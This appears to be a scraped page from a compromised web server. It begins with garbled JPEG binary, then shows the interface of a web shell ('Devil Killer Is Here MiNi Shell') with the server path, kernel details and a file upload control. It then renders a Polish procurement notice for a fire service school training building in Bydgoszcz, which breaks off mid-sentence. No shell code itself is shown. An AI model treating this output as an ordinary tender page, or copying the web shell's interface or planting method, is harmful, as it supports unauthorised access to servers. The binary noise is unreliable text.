JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230126/0006187201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku do celów szkoleniowych na terenie Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODOFICERSKA PAŃSTWOWEJ STRAŻY POŻARNEJ W BYDGOSZCZY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SP PSP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090585370</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Glinki 86</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-861</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 52 349 84 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 52 375 30 77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku do celów szkoleniowych na terenie Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abfd2bfb-9d7a-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00061872</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-abfd2bfb-9d7a-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2. Forma komunikacji: w postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu platformy e-zamówienia ezamowienia.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal/ oraz<br/>poczty elektronicznej przetargi@sppsp.bydgoszcz.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. Postępowanie, którego dotyczy<br/>niniejszy dokument oznaczone jest znakiem: SPT.2370.2.2023.Wykonawcy we wszelkich kontaktach z Zamawiającym powinni<br/>powoływać się na ten znak.<br/>2. Forma komunikacji: w postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia https://ezamowienia.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal/ oraz poczty elektronicznej przetargi@sppsp.bydgoszcz.pl/.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z platformy e-Zamówienia (dostępnym pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu) oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej ePUAP (dostępnych pod adresem: https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7. Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na platformie e-Zamówienia.<br/>8. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków, wyjaśnień treści oferty (innych niż w części XII SWZ), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez portal e-Zamówienia. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia m. in. (BZP, TED lub Numerem postępowania).<br/>9. Zamawiający zastrzega sobie możliwość komunikowania się z Wykonawcami za pomocą poczty elektronicznej, na adres podany<br/>przez nich w złożonej ofercie,<br/>10. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na wskazany w<br/>pkt 2 adres email. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452),<br/>rozporządzeniu Ministra Rozwoju, Pracy<br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 poz. 2415) oraz rozporządzeniu Rady Ministrów z dnia 12 kwietnia<br/>2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U.z 2012 r. poz. 526 z późn. zm).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO” informuję, że:<br/>1.1 Administratorem Pani/Pana danych osobowych jest Komendant Szkoły Podoficerskiej Państwowej Straży Pożarnej w<br/>Bydgoszczy, ul. Glinki 86, 85-861 Bydgoszcz, tel. 52 349 84 90, e-mail: sekretariat@sppsp.bydgoszcz.pl.<br/>1.2 W Szkole Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy wyznaczony został Inspektor Ochrony Danych, mail:<br/>iod@sppsp.bydgoszcz.pl.<br/>1.3 Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c ogólnego rozporządzenia<br/>o ochronie danych osobowych z dnia 27 kwietnia 2016 r. w celu związanym z postępowaniem<br/>o udzielenia zamówienia publicznego na dostawę samochodu operacyjnego dla Szkoły Podoficerskiej Państwowej Straży Pożarnej<br/>w Bydgoszczy SPT.2370.2.2023.<br/>1.4 Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm), dalej<br/>„ustawa Pzp”.<br/>1.5 Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>1.6 Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących, jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>1.7 W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>1.8 Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie<br/>z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>1.9 Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. B, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>...</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPT.2370.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Charakterystyka przedmiotu zamówienia:<br/>Przedmiot zamówienia obejmuje roboty budowlane polegające na budowie budynku do celów szkoleniowych na terenie<br/>Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy. Zamawiający posiada pozwolenie na budowę nr<br/>451/2021 z dnia 09.08.2021 r. Przedmiot zamówienia powinien być wykonany zgodnie z dokumentacją budowlaną,<br/>specyfikacją techniczną oraz przedmiarem robót (stanowi materiał pomocniczy), wg podziału na poszczególne branże:<br/>a) Branża budowlana.<br/>b) Branża sanitarna.<br/>c) Branża elektryczna.<br/>Przedsięwzięcie dotyczy budowy budynku B do ćwiczeń gaśniczych, zgodnie z dokumentacją projektową stanowiącą<br/>załączniki do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45216110-8 - Roboty budowlane w zakresie obiektów budowlanych dla służb porządku publicznego</p> <p class="mb-0">38295000-9 - Sprzęt topograficzny</p> <p class="mb-0">71353200-9 - Usługi opomiarowania</p> <p class="mb-0">71315300-2 - Usługi opomiarowania dla budownictwa</p> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <p class="mb-0">45112200-7 - Usuwanie powłoki gleby</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112330-7 - Rekultywacja terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45442120-4 - Malowanie budowli i zakładanie okładzin ochronnych</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">32410000-0 - Lokalna sieć komputerowa</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">32240000-7 - Kamery telewizyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45421141-4 - Instalowanie przegród</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według wzorów i opisów SWZ pkt. 17 zwycięży oferta która zdobędzie największą ilość punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) dodatkowa gwarancja oraz bezpłatny serwis i przeglądy na cały przedmiot umowy w tym na zamontowany sprzęt (powyżej 60 miesięcy gwarancji podstawowej)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Zamawiający wymaga wykazu co najmniej dwóch robót budowlanych o wartości minimum 250 000,00 zł. brutto każda, polegającej na budowie budynków mieszkalnych, technicznych lub użyteczności publicznej wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>b)	Zamawiający wymaga przedstawienia wykazu osoby/osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację <br/>o podstawie do dysponowania tymi osobami (dotyczy kierownika/kierowników budowy).<br/>c)	Zamawiający wymaga aby Wykonawca dysponował osobami, posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności:<br/>-	instalacyjnej w zakresie instalacji i urządzeń elektrycznych, teletechnicznych.<br/>-	instalacyjnej w zakresie instalacji sanitarnych i wentylacyjnych.<br/>-	ogólnobudowlanej.<br/>-	Mając na uwadze art. 117 ust. 1 ustawy Pzp Zamawiający zastrzega, że <br/>w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, warunek o którym wyżej mowa, musi być spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>-	W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunku udziału w postępowaniu w wykazie, dowodach lub referencjach waluty innej niż polska (PLN), Zamawiający rozpatrzy je zgodnie z zapisami pkt. 12 w części XXI SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Załącznik<br/>nr 4 do SWZ. Wymagany oryginał dokumentu lub potwierdzona za zgodność z oryginałem kopia<br/>podpisana kwalifikowanym podpisem elektronicznym, zaufanym lub osobistym. Zgodnie z 